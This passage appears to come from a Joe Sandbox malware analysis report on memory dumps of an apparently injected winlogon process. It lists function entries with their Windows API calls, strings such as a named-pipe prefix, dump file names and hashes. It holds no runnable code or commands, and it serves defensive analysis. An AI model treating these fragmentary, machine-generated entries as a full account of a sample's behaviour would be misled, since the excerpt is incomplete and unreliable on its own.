Part of subcall function 000001E8589EE22C: GetOEMCP.KERNEL32(?,?,?,?,?,?,FFFFFFFD,000001E8589EE578), ref: 000001E8589EE256

IsValidCodePage.KERNEL32(?,?,?,00000001,?,00000000,?,000001E8589EE6A9), ref: 000001E8589EE95B
GetCPInfo.KERNEL32(?,?,?,00000001,?,00000000,?,000001E8589EE6A9), ref: 000001E8589EE99F

Strings

!-M, xrefs: 000001E8589EE8F6

Memory Dump Source

Source File: 00000008.00000002.3545056111.000001E8589E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true

Associated: 00000008.00000002.3544153683.000001E8589E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3546079589.000001E8589F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3546958683.000001E858A00000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3547830442.000001E858A02000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3548702703.000001E858A09000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e8589e0000_winlogon.jbxd

Similarity

API ID: CodeInfoPageValid
String ID: !-M
API String ID: 546120528-3625753649
Opcode ID: 368bb57caff044830bbb836d0107136edbd08920f66937ca735bdc2bbc321278
Instruction ID: fbb97a023ca7a27056f9652c3de7910e2d6e6da190b104cd427da1fd2decefbf
Opcode Fuzzy Hash: 368bb57caff044830bbb836d0107136edbd08920f66937ca735bdc2bbc321278
Instruction Fuzzy Hash: EA8179726246C0C7E7768F26E4542ADFAA1FB44780F58813FDECE47691EE39D5618301

Function 000001E8589B27E8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 000001E8589B28CC
StrCpyW.SHLWAPI ref: 000001E8589B28E5

Part of subcall function 000001E8589B3F88: StrCmpNIW.SHLWAPI(?,?,?,000001E8589B272F), ref: 000001E8589B3FA0

Strings

\\.\pipe\, xrefs: 000001E8589B28D7

Memory Dump Source

Source File: 00000008.00000002.3539824965.000001E8589B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true

Associated: 00000008.00000002.3539036268.000001E8589B0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3540725433.000001E8589C5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3541560017.000001E8589D0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3542432651.000001E8589D2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3543268842.000001E8589D9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e8589b0000_winlogon.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
Instruction ID: 909c7db89837289c91e21428672992ba1c8be71d2c4bebd0607d515601003b91
Opcode Fuzzy Hash: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
Instruction Fuzzy Hash: 03717A32228BC28AEB349A66D9543EEF794FB84B85F500037DD4E57B89DE35C6018700

Function 000001E8589E27E8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 000001E8589E28CC
StrCpyW.SHLWAPI ref: 000001E8589E28E5

Part of subcall function 000001E8589E3F88: StrCmpNIW.SHLWAPI(?,?,?,000001E8589E272F), ref: 000001E8589E3FA0

Strings

\\.\pipe\, xrefs: 000001E8589E28D7

Memory Dump Source

Source File: 00000008.00000002.3545056111.000001E8589E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true

Associated: 00000008.00000002.3544153683.000001E8589E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3546079589.000001E8589F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3546958683.000001E858A00000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3547830442.000001E858A02000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3548702703.000001E858A09000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e8589e0000_winlogon.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
Instruction ID: e0e27b66e429965663d3b8188410bc82624911b767b8f40b8b78e93eddec74f8
Opcode Fuzzy Hash: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
Instruction Fuzzy Hash: CD717A32224BC2C6EB799E66D9943EEFA94FB84B84F540037ED4E47B89DE75C6108700

Function 000001E8589827E8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 000001E8589828CC
StrCpyW.SHLWAPI ref: 000001E8589828E5

Part of subcall function 000001E858983F88: StrCmpNIW.SHLWAPI(?,?,?,000001E85898272F), ref: 000001E858983FA0

Strings

\\.\pipe\, xrefs: 000001E8589828D7

Memory Dump Source

Source File: 00000008.00000002.3534599925.000001E858981000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true

Associated: 00000008.00000002.3533735218.000001E858980000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3535725858.000001E858995000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3536537928.000001E8589A0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3537361922.000001E8589A2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3538207117.000001E8589A9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e858980000_winlogon.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
Instruction ID: 8fac1a8813667edd01fca4bf786c4c2de05496bec2e0e38077a0113f49fd39e7
Opcode Fuzzy Hash: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
Instruction Fuzzy Hash: 0D717C36224BC286EB749EA6D9943EEF795FB85B84F540037DD0E87B89DE35C6008B40

Function 000001E8589580A0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 154COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000001E8589580CB
_IsNonwritableInCurrentImage.LIBCMT ref: 000001E858958162

Strings

csm, xrefs: 000001E858958149

Memory Dump Source

Source File: 00000008.00000003.2361473448.000001E858950000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E858950000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_3_1e858950000_winlogon.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm
API String ID: 3242871069-1018135373
Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction ID: 6a60bd09209a52f2539964aa68956d53568ae7179e18bce2abfa12d4f8870aa5
Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction Fuzzy Hash: B851A032331A80CAEB54CB16E445BEEB791EF44B9AF558536AE4E67788DF78C841C700

Function 000001E858959AFC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

_CallSETranslator.LIBVCRUNTIME ref: 000001E858959BA7

Strings

RCC, xrefs: 000001E858959B77
MOC, xrefs: 000001E858959B6F

Memory Dump Source

Source File: 00000008.00000003.2361473448.000001E858950000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E858950000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_3_1e858950000_winlogon.jbxd

Similarity

API ID: CallTranslator
String ID: MOC$RCC
API String ID: 3163161869-2084237596
Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction ID: 4c10b93590c364fe44ce2a6181efee628e5bd5224802c6c0238042b1dd9b6601
Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction Fuzzy Hash: 3B615632528BC4C6EB619B15E4407DEB7A0FB85B89F044226EF9D17B9ACF78C190CB00

Function 000001E8589B25DC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 000001E8589B26C2
StrCpyW.SHLWAPI ref: 000001E8589B26D9

Strings

\\.\pipe\, xrefs: 000001E8589B26CD

Memory Dump Source

Source File: 00000008.00000002.3539824965.000001E8589B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true

Associated: 00000008.00000002.3539036268.000001E8589B0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3540725433.000001E8589C5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3541560017.000001E8589D0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3542432651.000001E8589D2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3543268842.000001E8589D9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e8589b0000_winlogon.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
Instruction ID: 492e690b5fc0ba630569ef646d4e0cfcee60a2f75997ce79f0101205b737b0a1
Opcode Fuzzy Hash: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
Instruction Fuzzy Hash: 6951AD362287C1CDEA249A65E4943EEFB92FF84B82F440037DD5D43B99DE3AD4058744

Function 000001E8589E25DC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 000001E8589E26C2
StrCpyW.SHLWAPI ref: 000001E8589E26D9

Strings

\\.\pipe\, xrefs: 000001E8589E26CD

Memory Dump Source

Source File: 00000008.00000002.3545056111.000001E8589E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true

Associated: 00000008.00000002.3544153683.000001E8589E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3546079589.000001E8589F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3546958683.000001E858A00000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3547830442.000001E858A02000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3548702703.000001E858A09000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e8589e0000_winlogon.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
Instruction ID: b8a386359cbd7ed49b2b453e79f29644d783837d8ad6ce2b090bb6cfea9ca7bf
Opcode Fuzzy Hash: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
Instruction Fuzzy Hash: 5051B2362247C1C6EA259E65E4943EEFB92FB98B80F440137ED5D43B89DE3AD524C740

Function 000001E8589825DC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 000001E8589826C2
StrCpyW.SHLWAPI ref: 000001E8589826D9

Strings

\\.\pipe\, xrefs: 000001E8589826CD

Memory Dump Source

Source File: 00000008.00000002.3534599925.000001E858981000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true

Associated: 00000008.00000002.3533735218.000001E858980000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3535725858.000001E858995000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3536537928.000001E8589A0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3537361922.000001E8589A2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3538207117.000001E8589A9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e858980000_winlogon.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
Instruction ID: 6318a54d2b66f9efaecb8df6c52ce76569b66b11cde0a45df1b4d16293cb8c24
Opcode Fuzzy Hash: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
Instruction Fuzzy Hash: 1151C0362287C2CAEA649E6AE4543EEF792FB94B80F540037DE5D43B89DE39D404CB40

Function 000001E8589EE344 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 132COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32 ref: 000001E8589EE394

Strings

!-M, xrefs: 000001E8589EE35E
, xrefs: 000001E8589EE3D7

Memory Dump Source

Source File: 00000008.00000002.3545056111.000001E8589E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true

Associated: 00000008.00000002.3544153683.000001E8589E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3546079589.000001E8589F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3546958683.000001E858A00000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3547830442.000001E858A02000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3548702703.000001E858A09000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e8589e0000_winlogon.jbxd

Similarity

API ID: Info
String ID: $ !-M
API String ID: 1807457897-1849103749
Opcode ID: f3a1ccdfc844010f6d6384e8b727e223aafffbf012ce67cb554655a4b1010233
Instruction ID: 346d9ff4f4db9e371fd79dc0f46c3b961909a2f0264f4cc290ba0f25192b229b
Opcode Fuzzy Hash: f3a1ccdfc844010f6d6384e8b727e223aafffbf012ce67cb554655a4b1010233
Instruction Fuzzy Hash: 66517B726286C0CBE7218F25E0843DEBBA0F749748F64422BEACD47A85DF78C565CB40

Function 000001E8589C2660 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 000001E8589C2778
GetLastError.KERNEL32 ref: 000001E8589C279D

Strings

U, xrefs: 000001E8589C2722

Memory Dump Source

Source File: 00000008.00000002.3539824965.000001E8589B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true

Associated: 00000008.00000002.3539036268.000001E8589B0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3540725433.000001E8589C5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3541560017.000001E8589D0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3542432651.000001E8589D2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3543268842.000001E8589D9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e8589b0000_winlogon.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
Instruction ID: bb84fa12f88460f761866de61734aaedcb91246f2b6b8624b4e3301918a03819
Opcode Fuzzy Hash: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
Instruction Fuzzy Hash: 2441AE72625A80CAEB609F65E4447DEFBA5FB88784F804132EE4D87758EF39C441CB50

Function 000001E858992660 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 000001E858992778
GetLastError.KERNEL32 ref: 000001E85899279D

Strings

U, xrefs: 000001E858992722

Memory Dump Source

Source File: 00000008.00000002.3534599925.000001E858981000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true

Associated: 00000008.00000002.3533735218.000001E858980000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3535725858.000001E858995000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3536537928.000001E8589A0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3537361922.000001E8589A2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3538207117.000001E8589A9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e858980000_winlogon.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
Instruction ID: 58dd64383b29cb34c4e197e50f512c8b2068d31f863029e08f951eb50e9250b4
Opcode Fuzzy Hash: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
Instruction Fuzzy Hash: 2741AE72625A80C6EB209F65E8447DEF7A2FB88784F804132EE4D87758EF38C441CB40

Function 000001E8589F2544 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 000001E8589F2610
GetLastError.KERNEL32 ref: 000001E8589F262C

Strings

!-M, xrefs: 000001E8589F255F

Memory Dump Source

Source File: 00000008.00000002.3545056111.000001E8589E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true

Associated: 00000008.00000002.3544153683.000001E8589E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3546079589.000001E8589F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3546958683.000001E858A00000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3547830442.000001E858A02000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3548702703.000001E858A09000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e8589e0000_winlogon.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: !-M
API String ID: 442123175-3625753649
Opcode ID: 9aaf26f040ad1ec26527c6482f0f95a02a03d15fd00723e3f37292bb076685c6
Instruction ID: cb3e498f02afde4d42e4f75e6eca5d6d130e2b4fee760a12fe279dbe9165c968
Opcode Fuzzy Hash: 9aaf26f040ad1ec26527c6482f0f95a02a03d15fd00723e3f37292bb076685c6
Instruction Fuzzy Hash: 77317872621A80CAEB659F29E8843CDF3A0FB58784F944032EE8D87754EF38C551CB00

Function 000001E8589F243C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 000001E8589F24F4
GetLastError.KERNEL32 ref: 000001E8589F2510

Strings

!-M, xrefs: 000001E8589F2457

Memory Dump Source

Source File: 00000008.00000002.3545056111.000001E8589E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true

Associated: 00000008.00000002.3544153683.000001E8589E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3546079589.000001E8589F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3546958683.000001E858A00000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3547830442.000001E858A02000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3548702703.000001E858A09000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e8589e0000_winlogon.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: !-M
API String ID: 442123175-3625753649
Opcode ID: 2b49dc1147f62743d5f71a8e2f42af263b7a37484780a08d876dda563020fbab
Instruction ID: a092438e22dac429953ebf923f65492620b9caa79ea66b73cebbfaf07635e6b5
Opcode Fuzzy Hash: 2b49dc1147f62743d5f71a8e2f42af263b7a37484780a08d876dda563020fbab
Instruction Fuzzy Hash: CD319F72224A80CAEB159F25E4843CDF7A0FB58784F844032EE4E87755DF38C555CB00

Function 000001E8589EDF38 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32 ref: 000001E8589EDF73
GetLastError.KERNEL32 ref: 000001E8589EDF7D

Strings

!-M, xrefs: 000001E8589EDF52

Memory Dump Source

Source File: 00000008.00000002.3545056111.000001E8589E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true

Associated: 00000008.00000002.3544153683.000001E8589E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3546079589.000001E8589F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3546958683.000001E858A00000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3547830442.000001E858A02000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3548702703.000001E858A09000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e8589e0000_winlogon.jbxd

Similarity

API ID: ErrorFileLastModuleName
String ID: !-M
API String ID: 2776309574-3625753649
Opcode ID: afd8fe68969716b5af19fc5389df831274dd0723d0692592c9853f2af0341627
Instruction ID: 0877bf78c1458f2c1db12822aa1d5ce982476afaf02ea8560513a900ca33586e
Opcode Fuzzy Hash: afd8fe68969716b5af19fc5389df831274dd0723d0692592c9853f2af0341627
Instruction Fuzzy Hash: CA316B32228BC0CBE7618B25E4443DEBBA4FB89795F540126DACD47BA8DF38C550CB41

Function 000001E8589B9178 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.NTDLL ref: 000001E8589B91C8
RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,000001E8589B87F7), ref: 000001E8589B9209

Strings

csm, xrefs: 000001E8589B91F6

Memory Dump Source

Source File: 00000008.00000002.3539824965.000001E8589B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true

Associated: 00000008.00000002.3539036268.000001E8589B0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3540725433.000001E8589C5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3541560017.000001E8589D0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3542432651.000001E8589D2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3543268842.000001E8589D9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e8589b0000_winlogon.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
Instruction ID: 8e57883d678877deaf96a3c60fdd68ab16596737b83dceb692cddac051c20a70
Opcode Fuzzy Hash: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
Instruction Fuzzy Hash: 7C11FB32228B80C6EB618B15F44439DB7E5FB88B94F584225EE8D07B64EF3DC551CB00

Function 000001E8589E9178 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.NTDLL ref: 000001E8589E91C8
RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,000001E8589E87F7), ref: 000001E8589E9209

Strings

csm, xrefs: 000001E8589E91F6

Memory Dump Source

Source File: 00000008.00000002.3545056111.000001E8589E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true

Associated: 00000008.00000002.3544153683.000001E8589E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3546079589.000001E8589F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3546958683.000001E858A00000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3547830442.000001E858A02000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3548702703.000001E858A09000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e8589e0000_winlogon.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
Instruction ID: 39ef4274deee12ef7542864adfbf82197b388cece3bd9ae8090adda0d5c27b6f
Opcode Fuzzy Hash: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
Instruction Fuzzy Hash: FB11FB36224B80C2EB658B15F44429DBBE5FB88B94F584225EE8D07B64EF7CC561CB00

Function 000001E858989178 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.NTDLL ref: 000001E8589891C8
RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,000001E8589887F7), ref: 000001E858989209

Strings

csm, xrefs: 000001E8589891F6

Memory Dump Source

Source File: 00000008.00000002.3534599925.000001E858981000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true

Associated: 00000008.00000002.3533735218.000001E858980000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3535725858.000001E858995000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3536537928.000001E8589A0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3537361922.000001E8589A2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3538207117.000001E8589A9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e858980000_winlogon.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
Instruction ID: 6504c3570675247b7c278e0ad6195a10b38ca5f4628e3c9ff3024be3bc0f689c
Opcode Fuzzy Hash: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
Instruction Fuzzy Hash: AF110D32229B81C2EB618F15F44429EB7E5FB88B94F584226EE8D07B64DF3CC551CB00

Function 000001E8589B1D30 Relevance: 5.0, APIs: 4, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000001E8589B1D69
HeapAlloc.KERNEL32 ref: 000001E8589B1D77
GetProcessHeap.KERNEL32 ref: 000001E8589B1D9C
HeapFree.KERNEL32 ref: 000001E8589B1DAA

Memory Dump Source

Source File: 00000008.00000002.3539824965.000001E8589B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true

Associated: 00000008.00000002.3539036268.000001E8589B0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3540725433.000001E8589C5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3541560017.000001E8589D0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3542432651.000001E8589D2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3543268842.000001E8589D9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e8589b0000_winlogon.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID:
API String ID: 756756679-0
Opcode ID: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
Instruction ID: a1a03c553d0de311f7bf062a3fd0df36befeb04505d542d6e641286c580bfaa3
Opcode Fuzzy Hash: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
Instruction Fuzzy Hash: 21113C21625BC0C6EB14DB66E80829DB7A0FB88FD1F594125DE4E57765DF39D4428300

Function 000001E8589E1D30 Relevance: 5.0, APIs: 4, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000001E8589E1D69
HeapAlloc.KERNEL32 ref: 000001E8589E1D77
GetProcessHeap.KERNEL32 ref: 000001E8589E1D9C
